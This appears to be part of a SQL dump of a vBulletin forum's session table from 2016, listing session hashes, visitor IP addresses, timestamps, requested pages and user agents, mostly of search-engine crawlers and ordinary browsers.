('aa03e93d18fa0a23eb8c605356949336', 0, '66.249.69.108', 'a938925ca9403f145c82d10ebc1ecbe1', 1474735607, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4b853736f54130226cc21e0f17e663f3', 0, '172.68.11.250', 'ed2b0f6ca306d3c28d97284c881e1a62', 1472382209, '/sendmessage.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e3aa132e0df2fd93a3d7e8b259db33c9', 0, '172.68.10.238', 'ed2b0f6ca306d3c28d97284c881e1a62', 1472383028, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('baf39240599d1b6531e9832172dd2493', 0, '199.115.115.139', 'df1a1d7fd093f6e5a8b7156a4df4c664', 1472384677, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7bf811c5c05877af61063528e835d2cb', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472392638, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('f1f4e6ef6e1ac73629317fb1f0fef4c4', 0, '172.68.59.101', 'a938925ca9403f145c82d10ebc1ecbe1', 1472395494, '/archive/index.php/t-2383.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('9adf3fafd48ae817c4e04f92adc2487c', 0, '79.3.10.148', 'b820896c85df8ee00c8920034b671577', 1472409601, '/memberlist.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('42004e9ad7061cf1b803adcca4ab495b', 0, '46.227.67.189', '39d74d93383516ab3253a084f4e723f2', 1472414893, '/register.php?', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('93016ba906669c2fec20f21212cbec07', 0, '2a02:587:3112:8', '537fce545e0b32ca773bfd1bb93b6cff', 1472417969, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f2d745f159070f1ec726204e35e27bd3', 0, '91.93.26.15', 'eca05408fc4cf00bac59d6ad3c1a0e2b', 1472425077, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6f7473bdc85419f05bb4333214cc6924', 0, '157.55.39.11', '23f3103f44bc3badcba53554e5e4cb6d', 1472428494, '/showthread.php?p=2800&mode=threaded', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3296a1f18cc2000b1791151968b490bd', 0, '40.77.167.3', 'c5490a5a8e1813ac25cf9e19091dcb85', 1472468567, '/register.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0d0f6b9e9f2b123da2111b88a8cdb5d2', 0, '157.55.39.234', '23f3103f44bc3badcba53554e5e4cb6d', 1473730588, '/showthread.php?p=2933', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c605f497632a208c4f015fdfec3069ed', 0, '172.68.58.98', 'a938925ca9403f145c82d10ebc1ecbe1', 1472434572, '/archive/index.php/f-32.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('e6b311fa27e5a5dd7ac4f602388ef7fb', 0, '66.249.69.157', 'a938925ca9403f145c82d10ebc1ecbe1', 1475026349, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6e7196109f5820f4a07fb6e6bee5ee70', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472435685, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('7f8d6b85d07276bed3f59aaeec7bc2ca', 0, '46.227.67.167', '39d74d93383516ab3253a084f4e723f2', 1472437225, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a5ef463a2b0d555de8f0faa35d392b6f', 0, '204.106.238.98', '7926711ddf6fb8dc7111edb549db0d9d', 1472440220, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a56cea8228ec64ea17c5da7a2f4d3047', 0, '172.68.59.96', 'a938925ca9403f145c82d10ebc1ecbe1', 1472445652, '/search.php?searchthreadid=2461', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5ff821d8a6e2fc943446990a32468db8', 0, '172.68.58.132', 'a938925ca9403f145c82d10ebc1ecbe1', 1472449100, '/archive/index.php/t-1175.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('a6e381842836fd9547a55cb1c997b431', 0, '172.68.58.82', 'a938925ca9403f145c82d10ebc1ecbe1', 1474320074, '/login.php?do=lostpw', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f7b9831fc92699c67e0246a703058748', 0, '217.12.210.181', '66b1971d4a442889b7404e9f969f566e', 1472452934, '/index.php?', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c467619f2a76cb5bc6d8af28a3463003', 0, '172.68.58.110', 'a938925ca9403f145c82d10ebc1ecbe1', 1472456891, '/search.php?searchthreadid=2239', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2032afa9345064bb9b449166078d1569', 0, '212.98.128.91', 'c5a735126f707c4d6a2ad762301b03b2', 1472625673, '/register.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fe57d375e59fbdbd1fe3ccf87fc2bc95', 0, '172.68.59.72', 'a938925ca9403f145c82d10ebc1ecbe1', 1472462475, '/showthread.php?p=1034', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d146cb2350a35287121eb2f3c8f1a751', 0, '172.68.59.70', 'a938925ca9403f145c82d10ebc1ecbe1', 1472468151, '/converse.php?u=33&u2=277', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6796153ece353ae81592c52189db3a2c', 0, '197.129.114.50', 'a85b75752806e86ff746b39d115f4c12', 1472469486, '/showthread.php?t=1030', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fd5f286c9b826d0c3fe308079bf9d27e', 0, '172.68.59.93', 'a938925ca9403f145c82d10ebc1ecbe1', 1473362972, '/faq.php?faq=vb3_board_faq&langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3d33086b2440458872a15faed9a6a63a', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472478701, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('f814e010f54693324ca30860c4314165', 161, '172.68.29.181', 'd8752cf67051540a22ada9c27a70dc20', 1472478933, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('12506428987b047172eb6b8b6ad08583', 0, '172.68.59.83', 'a938925ca9403f145c82d10ebc1ecbe1', 1472479393, '/search.php?searchthreadid=2465', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0ac896bcdd0c164f526b7c550797cdea', 0, '199.71.233.178', '4ba18f0bb47e29c69fbcee0c83360f7c', 1472500795, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9ca3ba0bc84a342684f2d6f968e657c0', 0, '108.230.107.89', '9d188cacea464cee3977b3dfbc369068', 1472514980, '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e7058b658f5cd15676590a3b31585db1', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472521397, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('adf1e85a668289d452bead4801aaff42', 0, '222.237.159.162', '10f87fb489228c4cb8482359e6dfb19e', 1472523612, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('51148de6787fef7150ef7d0552497f2d', 0, '172.68.10.240', '81214a785dde3f23cbbcd620b43b380c', 1472525344, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3a595d258052fc69f2bc72e884fec34a', 0, '2a02:598:2::171', 'b1ae3a71b0b8dd7831aa278457a1ae89', 1472525074, '/login.php?do=lostpw', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8d903e69f5ccc4aa201ca023bfdfcffb', 0, '157.55.39.167', '23f3103f44bc3badcba53554e5e4cb6d', 1472791162, '/showthread.php?t=1835', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f0c7a3d8564f6bc127084cc938fed1d6', 0, '94.191.185.127', '51fa904c0adbb7126f6709202fcd2d81', 1472542559, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MOB30Z; wv) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cae07b7a8dafc647263afb04c03ae451', 0, '172.68.11.247', 'fd96083c73c548ea315f94d329ed8168', 1472544591, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('356f0555fc49add6d23108a1c61b7ff4', 161, '54.233.145.152', 'd8752cf67051540a22ada9c27a70dc20', 1472558730, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('03b56714c27341528457248fc4383d9a', 0, '128.153.145.125', 'cbb1d09b470c13563e338cb9c55fd041', 1472563151, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('acf40ab6c93788d31a21fba66268c0fe', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472564496, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('340c9e9eb8456d7c5b14c2e696603e80', 0, '66.249.73.139', 'd8a3621051418f62d9ffdc31af6b58df', 1472986934, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('66dbecab8179d99896437e67e8c43640', 0, '41.109.237.185', '82c0990b266d9ced20ccd4f8879987c8', 1472586812, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1f3c0cd00ab4b7edcdaae876d1d1c7d7', 0, '66.249.73.231', 'd8a3621051418f62d9ffdc31af6b58df', 1472972864, '/faq.php?faq=vb3_reading_posting&langid=1', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('29f70e4edd122e45592e29a29133fea6', 0, '66.249.73.223', 'd8a3621051418f62d9ffdc31af6b58df', 1472896536, '/archive/index.php/t-1175.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('4af05693dbeeeb0636d753e7c5feb582', 0, '66.249.73.215', 'd8a3621051418f62d9ffdc31af6b58df', 1472956725, '/tags.php?tag=exploit-kit', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ddaf3cac06f615a364553e467dc4809b', 0, '157.55.39.0', '23f3103f44bc3badcba53554e5e4cb6d', 1472791165, '/search.php?searchthreadid=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e607bf31be0935b8ba4dd1be3a70d8db', 0, '207.46.13.26', '5e207e311e22cdc3b2095126a922fa93', 1472604791, '/showthread.php?p=3046', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('51c06434f5ad770809ce54b68a28d6ce', 0, '40.77.167.88', 'c5490a5a8e1813ac25cf9e19091dcb85', 1472604799, '/search.php?do=getdaily', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3c7fad475fc63dcb4e83fc52f91902c6', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472607206, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('64518c8dc5fb0afd322bbac1d4660109', 0, '66.249.73.247', 'd8a3621051418f62d9ffdc31af6b58df', 1472986747, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('53fbdd5f7ee8055d7cca670080f51963', 0, '130.105.139.56', '14c168517c5b7caffb2ee0a8e75bb136', 1472622426, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('394c26031dfd47425ab7affbf3e8ea82', 0, '107.170.211.230', '789f22c88478240e115f4b3d674e88c3', 1472619550, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f65ddf54ab54027e845b16df5f22d4d0', 0, '199.59.150.182', '943ffc0fc3c44360d2911a2a7ed4b039', 1472622977, '/showthread.php?t=1030', 'Twitterbot/1.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b50de5f9bf540eff66e037a843f3124c', 0, '195.142.6.210', '0b4d1201909534c09ea696cd6e062493', 1472627087, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b04b9e72a1a5adc980e29054c724aea3', 0, '197.225.76.182', '7d4ead64d42fa6164d6e761b6fa5dda4', 1472629354, '/showthread.php?p=2995', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('16b56de0d850d55a1c8dd10f1dad345a', 0, '31.203.104.160', 'bd0c97025def2483ba06e3c8139df68c', 1472629914, '/memberlist.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('18eee1c991ed89e372e8ec5aa1611466', 0, '112.198.103.110', 'cbf05bcc13e514337d9fb6caff057ed3', 1472630476, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('06811c7381e6f4ed4f94dfef2697e57d', 0, '192.38.33.14', 'fbb5010aaabf5b13be7f077c6a2e9654', 1472633183, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1eef976ebb34b04e34898c517358484c', 0, '94.185.84.142', '5be2be37dd42b7190ea3991e85cd1e3a', 1472635841, '/search.php?do=process&do=process', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('73580674b09190a956e46627b8cda0a3', 0, '66.249.73.148', 'd8a3621051418f62d9ffdc31af6b58df', 1472640387, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('859bd3bc067c854e1f0e38d600c7257d', 0, '213.17.226.13', '789dfa89e5fc66f8755368a1260aab6c', 1472643440, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6218f58c69dbf9bbaf15865ad5b04c3c', 0, '105.158.240.158', '86cc60166b9afa1e81409198301f367f', 1472644343, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1c48a1dc9d0a18bc50f8b5d852cbb455', 0, '213.144.110.50', '24edb6cfc524f351b4bc7a9dfc449e88', 1472646038, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6f226250153cee9c62b45a5f29a1d835', 0, '37.161.118.40', '4e8a2766a1ee85364f4040674ed19ce4', 1472649135, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7dca49e82b16975d1ac4cc3853caca61', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472650144, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('2aa1e66edef2f42f3dcba2e1c77f479f', 0, '14.181.109.232', '15ded1d5a1b84c21b10c76ffc78422be', 1472650948, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4aed425d4c1854cf252122306b1f76f0', 0, '66.249.79.112', '42382f72607791905ff50694f07a1e96', 1474696716, '/archive/index.php/t-2380.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('0f66108831da4eb1f5b45e69145f222e', 0, '162.211.178.141', '01ccf4a80c91f180a582e631a0816dba', 1472653321, '/memberlist.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('522ef56eedb440d79443f7fa96b8e123', 0, '66.249.79.116', '42382f72607791905ff50694f07a1e96', 1474699467, '/archive/index.php/t-2505.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('86e407eb99c06c9f6f13abb12ec98fe6', 0, '66.249.79.124', '42382f72607791905ff50694f07a1e96', 1474718397, '/login.php?do=lostpw', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2e618b5decb948ad57f43d413e28051a', 0, '94.132.126.206', 'bbfb762d3e6a128cd8ac21d413b715f8', 1472671203, '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('713be05a6df36d2429a64d56d1f7261e', 0, '176.233.239.55', 'd8d01288988d7398d4dbb6e5fe3c3616', 1472673232, '/index.php?', 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9e06231a860c7b6827f6869ebb645533', 0, '213.174.21.41', '9421c5981a1db82c1f3cce30efc8f627', 1472673847, '/index.php?', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('31e6db1c830b281979b509beaae19ad9', 0, '200.112.253.120', '2ba8ee01044a8755f920392ad0391c15', 1472690407, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6db294413e47b07770b7693cb0115e48', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472692915, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a9066ef1c77b07e5c154a1c7878dfd0b', 0, '216.155.129.59', 'f50f9e2c28965067685437ce26287ea0', 1472702996, '/login.php?do=lostpw', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d67d08aa339bd9cae787d39dbcc5af64', 0, '195.88.154.2', '3a5e0c4f100a810d1a5072ea92533f6d', 1472704482, '/index.php', 'python-requests/2.11.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('efcff32c9bbb932efe5b4611c7e5de21', 0, '173.23.106.173', 'fcd81b0c844b406d86a48c92d85bbf68', 1472707675, '/showthread.php?p=3012', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ed9d40b3d6a9e1f0f8a9aa583a0cd5e1', 0, '154.43.0.14', 'cafa6fabb8c23d26056919795d376ce6', 1472713583, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('094c626f89f68633f127eb5835979b46', 0, '195.235.98.178', '8527832c32d4f225f921fb61753186cd', 1472721432, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f9d4afd8b94e2ccf121a41ed948faf5d', 0, '93.73.201.100', '09aabec1729b4c6174446d0101ae3978', 1472727286, '/showthread.php?p=2688', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fc5d4ad823e2b652134d181cf556c091', 0, '172.68.34.81', 'b82943e61bcbcf9d48406b07c3c4bca2', 1472727708, '/showthread.php?t=2334', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8386ab1b35517cd573c2ad0f968a94b2', 0, '2001:470:28:839', '1c1645372ea101ec45ec9a9142b14989', 1472728577, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('020db1390ab81a9b03a629c1372e2e62', 0, '173.247.233.250', 'e162f22e8fb061b6ed34a4dc3e9da007', 1472728618, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('72fce1be5b62b0a80864c99bfd2fd36a', 0, '163.18.42.42', '916cd7f4ec00052d84f60dbf171a7470', 1472729399, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('aab57607d5013b541e29d4c0affd1882', 0, '36.88.158.34', 'b3aea8333d10232e5cf506bd83b8e032', 1472730538, '/showthread.php?p=3046', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('263edcd9493dc603d4c09d56425b98ff', 0, '50.118.198.8', '6cf1c640d768a83222ac962df59cd3b3', 1472731628, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e36a7d0478a7bce98891082245c59701', 0, '168.1.53.243', '51978e2f6ed12a9a4d89016ef9642887', 1472734455, '/memberlist.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('7e251194213100fb1a7d00482acdf8af', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472736051, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('8fbc0b654080ae39cc36c8fe6074c84a', 0, '71.19.252.32', '7107969700fb6a7ff53ee227a24c5566', 1472737164, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
